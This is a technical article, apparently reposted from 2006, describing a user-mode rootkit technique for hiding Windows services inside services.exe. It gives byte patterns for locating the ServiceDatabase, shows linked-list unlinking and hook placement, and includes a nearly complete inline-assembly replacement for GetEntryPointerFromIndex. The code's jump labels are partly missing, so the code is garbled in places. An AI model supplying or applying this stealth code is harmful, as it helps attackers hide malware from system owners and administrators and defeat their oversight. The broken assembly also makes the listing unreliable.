
hooking the service manger with hacker defender

王朝c#·作者佚名  2006-12-16
窄屏简体版  字體: |||超大  

hooking the service manger with hacker defender



The idea of this method for hiding windows services directly from within

the service manager came to me after I coded a hidden services detector

and I realized that is was really easy to trick many user-mode rootkit...

So I started to search for infos about the service manager, and I found a

really good paper (and I found nothing else, ever) explaining very few thing,

but the article put me on the right track. So I started to reverse the service

manager and I found an interesting structure (name it the ServiceDatabase)

containing all services running on a computer. I knew that it was this

structure that I will have to patch. The first problem I had was to find

these structure with no hardcoded addresses on all NT-based OS. This problem

was really easy to solve, a simple search for a pattern of byte (one for XP

and one for win2k) did the thing. Then another problem: it is easy to remove

a services from the ServiceDatabase but what happen if we want to stop or remove

this service ? We can't control it anymore, it's just like if the service has

never existed.

I had two choices. First, make a new set of functions to mimic the service

manager do to be able to control the hidden services. But this would imply

that no standard command like net start/net stop would ever work, and that

sucks. The second possibility is to find a way to tell to the service manager

that the request for controling a hidden service is authorized. The second

sounds better.


The client-side services display:

To let the service manager know that we have the right to display the

hidden services, we will have call EnumServicesStatus with a dwServiceState

parameter to wich you will add a number (we'll call it dwNumber, heh)

We will then check, on the server-side, if the dwServiceState parameter


dwNumber+SERVICE_STATE_ALL. If it is, we'll substract dwNumber to get

the real dwServiceState.

You may have noticed that you will need a home-made program to display the

hidden services to wich you will be able to supply the correct dwNumber


The server-side hooking:

The hooking process will be this :

1. locate all needed pieces of code, to be sure we're doing the good thing

2. change the linking order of the ServiceDatabase to hide our services

3. place hooks at some strategic points


1. Locate needed information


We will first need to locate some information about where we will install

our hooks, and this before doing any modification in the memory of

services.exe just to don't crash the whole thing. We will basicly search

for the ServiceDatabase and then search for the hooking points, I will

give more details in the two next sections


2. Modify the ServiceDatabse


The ServiceDatabase is a double-linked list that contain informations

about all services running on a computer. It is located in the memory

of services.exe (duh) and it is built at boot time based on keys

in HKLM\SYSTEM\CurrentControlSet\Services. Just after building the

database, services.exe start all service with their Startup Type set to

Automatic. This is why a rootkit can be detected even if it hide keys

from the registry; a clean copy of the HKLM\[...]\Services key exist

somewhere in the memory of services.exe :)

The ServiceDatabase is relatively easy to find, depending on the version

of services.exe. ImageVersion refers to the field of the same name in

the PE header. The search base is the 'base of code' address (usually

01001000h) plus the size of the 'import address table' (usually ~400h

bytes) wich can also be found in the PE header. Please note that I am

debugging services.exe on my XP box, and addresses and size may differ

on win2k.

If ImageVersion = 5.1 or 5.2 (WinXP, Win2k3) :

Search in the first 200h bytes for the sequence of byte 56 8B 35

(56 = PUSH ESI, 8B 35 xx xx xx xx = MOV ESI, DWORD PTR DS:[ServiceDatabase])

If ImageVersion = 5.0 (Win2k) :

Search in the first 4000h bytes for 73 45 72 76 (sErv) (will be found after

~2C00h bytes). Then search in the next 200h bytes for 8B 0D xx xx xx xx

(MOV ECX, DWORD PTR DS:[ServiceDatabase])

At this point, we are ready to patch the ServiceDatabase and remove our

hidden services. In the next example we want to hide the service B and D.

This is basicly what we will do :

* Flink = Forward link, point to the next structure

* Blink = Backwad link, point to the previous structure

-> The original service chain

ServiceDatabase pointer


`-> _____ Flink _____ _____ _____ _____ _____

| svc | -----> | svc | -----> | svc | -----> | svc | -----> | svc | -----> | svc |

| A | <----- | B | <----- | C | <----- | D | <----- | E | <----- | ... |

|_____| Blink |_____| |_____| |_____| |_____| |_____|

-> We will unlink the svc B by linking the service A and C together

ServiceDatabase pointer

| .--------------. .--------------.

| | .----------. | | .----------. |

`-> _____ | | _____ | | _____ | | _____ | | _____ _____

| svc | --` | | svc | | `--> | svc | --` | | svc | | `--> | svc | -----> | svc |

| A | <---` | B | `----- | C | <---` | D | `----- | E | <----- | ... |

|_____| |_____| |_____| |_____| |_____| |_____|

-> Then we will link the service D to the service B and the service B to

the start of the list

ServiceDatabase pointer

| .--------------. .--------------.

| | .----------. | | .----------. |

`-> _____ | | _____ | | _____ | | _____ | | _____ _____

Flink | svc | --` | | svc | | `--> | svc | --` | | svc | | `--> | svc | -----> | svc |

.---> | A | <---` | B | `----- | C | <---` | D | `----- | E | <----- | ... |

| |_____| |_____| |_____| |_____| |_____| |_____|

| | ^ | ^ |

| | | `-------------------------` |

`----------------------` `-----------------------------`

This new linking is the whole thing in the hooking process. If this is

done correctly, at least the services are hidden from any request for

enumerating services and for opening a services with OpenService().

Then what if we want to display these hidden services ? We will simply

put a hook at a strategic point (see the next section) and if the program

trying to enumerate the services is authorized to do so, we won't start the

enumeration from the service pointed by ServiceDatabase, but (in the example)

from the service D in our case. **NOTE** that there is no Backward link from

the service B to the servide A, in order to don't be able to see the hidden

services by listing the list in the reverse order...


3. Hooking the code


We'll start by searching for the sequence of bytes C0 FE FF FF in the first 6000h bytes

the lines on wich we will end up will look like this:


JNZ SHORT error_87

TEST BYTE PTR SS:[EBP+10],3 <------- check for the validity of dwServiceState

JE SHORT error_87 <------- we will backup the address pointed by this jump

TEST DWORD PTR SS:[EBP+10],FFFFFFFC for our own usage in our hooked function

JNZ SHORT error_87

To don't get trashed when we will supply our invalid dwServiceState, we

will NOP the four last lines and check the validity by ourself later with

our hooked function. To find where we'll place this hook, we'll search

in the next 100 bytes for 85 C0 wich correspond to :




CALL GetEntryPointerFromIndex <------ here we hook !

TEST EAX,EAX <------ 85 C0

JE not_found

then you just have to replace the GetEntryPointerFromIndex CALL for

our own home-made function. What is the original function doing ? It

find where to start the copying process from the memory of services.exe

to the user-supplied buffer, according to the ResumeHandle parameter

passed to EnumServicesStatus. What will the replacement function do ?

Lets see :

First we'll have to check if the dwServiceState come from a 'typical' call

to EnumServicesStatus. If it is, (will be between 1 and 3; see declaration

of SERVICE_[ACTIVE/INACTIVE/STATE_ALL]) we will mimic the original

GetEntryPointerFromIndex function and do nothing more. If the dwServiceState

parameter is equal to dwNumber + 1, + 2 or + 3 then we'll know that it's a

request for showing hidden services, and we'll start to do the job of

GetEntryPointerFromIndex but we'll do it from the base of our hidden services

list. If dwServiceState does not correspond to any of these two case, we'll

return the error 87 (remember the dwServiceState validity check we've nopped)

okey then we have a plan of action, have a look at the hooking code I made.

the original function definition looks like this :

BOOL GetEntryPointerFromIndex (int index, LPDWORD entry);

When we will have our function called instead of the original one, the stack

will look like this :

ebp+10h = the dwServiceState parameter passed to EnumServicesStatus

esp+8h = the ResumeHandle parameter passed to EnumServicesStatus

wich is actually the index in the ServiceDatabase table

esp+Ch = the buffer in wich we will copy the address of the correct entry

First of all we'll backup the address of ebp+10h to be able to replace

the dwServiceState if the need is. Then we'll check if the dwServiceState

is invalid or not, and choose what we must do.

Below is a fully working function, I think it can be better but it do the job

See the code sample and you will understand everything ;)

//the CALL we replace must point 16 bytes after the real function address

//before copying the function inside services.exe, you must fill the four

//dword that the function need to work:

//dwNumber = the same number that you will provide to EnumServicesStatus

// to display the hidden services

//dwHiddenStart = the address of the first service in the hidden service chain

//dwSvDb = address of ServiceDatabase

//dwError87 = the absolute address of the jump we nopped (see above)

BOOL __declspec(naked) NewGetEntryPointerFromIndex(int index, LPDWORD entry) {

__asm {


_emit 0 //;room for a copy of dwNumber

_emit 0

_emit 0

_emit 0


_emit 0 //;room for the address of the hidden services chain

_emit 0

_emit 0

_emit 0


_emit 0 //;room for a copy of the ServiceDatabase

_emit 0

_emit 0

_emit 0


_emit 0 //;room for the address of the error 87 code

_emit 0

_emit 0

_emit 0

call start


pop edx //; pop the address of where we are

sub edx, 16+5

pop esi //; pop the ret address

lea eax, [ebp+010h] //; copy the address of the dwServiceState parameter

push ebp

mov ebp, esp

sub esp, 008h


-008 DWROD ret address

-004 LPDWORD dwServiceState

+004 int index

+008 LPDWORD entry


mov [ebp-004h], eax

mov [ebp-008h], esi

//; check if we got all we need

cmp dword ptr [edx], 0 //;dwNumber

jz display_normal

cmp dword ptr [edx+4], 0 //;dwHiddenStart

jz display_normal

cmp dword ptr [edx+8], 0 //;dwSvDb

jz bad_ret

cmp dword ptr [edx+12], 0 //;dwError87

jz bad_ret

//; check the dwServiceState

mov esi, [ebp-004h]

mov esi, [esi]

//; is it a request for hidden svc ?

mov eax, dword ptr [edx] //;dwNumber

lea eax, [eax+1]

cmp esi, eax

jz display_hidden

mov eax, dword ptr [edx] //;dwNumber

lea eax, [eax+2]

cmp esi, eax

jz display_hidden

mov eax, dword ptr [edx] //;dwNumber

lea eax, [eax+3]

cmp esi, eax

jz display_hidden

//; is it an invalid request ?

mov esi, [ebp-004h]

test byte ptr [esi],3

je go_original_err87

test dword ptr [esi], 0FFFFFFFCh

jnz go_original_err87

//; heh, just another normal request I guess

jmp display_normal

//; process the request


mov esi, [ebp-004h]

mov eax, dword ptr [edx] //;dwNumber

sub [esi], eax //;substract dwNumber to dwServiceState

lea eax, dword ptr [edx+4] //;dwHiddenStart

jmp display_tail


mov eax, dword ptr [edx+8] //;dwSvDb

//mov eax, [eax]

//jmp display_tail


mov eax, [eax]


test eax, eax

jz short bad_ret //; got the end of the chain ?

mov ecx, [eax+010h] //; index field

cmp ecx, [ebp+004h] //; needed index

ja short got_ptr

mov eax, [eax+004h] //; take the next entry

jmp short loop_next_svc_entry


mov ecx, [ebp+008h]

mov [ecx], eax


mov eax, 001h

jmp go_ret


xor eax, eax


mov esi, [ebp-008h]


add esp, 008h //;ret 008

jmp esi


leave //;free the stack

mov eax, dword ptr [edx+12] //;dwError87

add esp, 008h //;ret 008

jmp eax




// EOF

I think I said everything, now you can look at the sources I included :)

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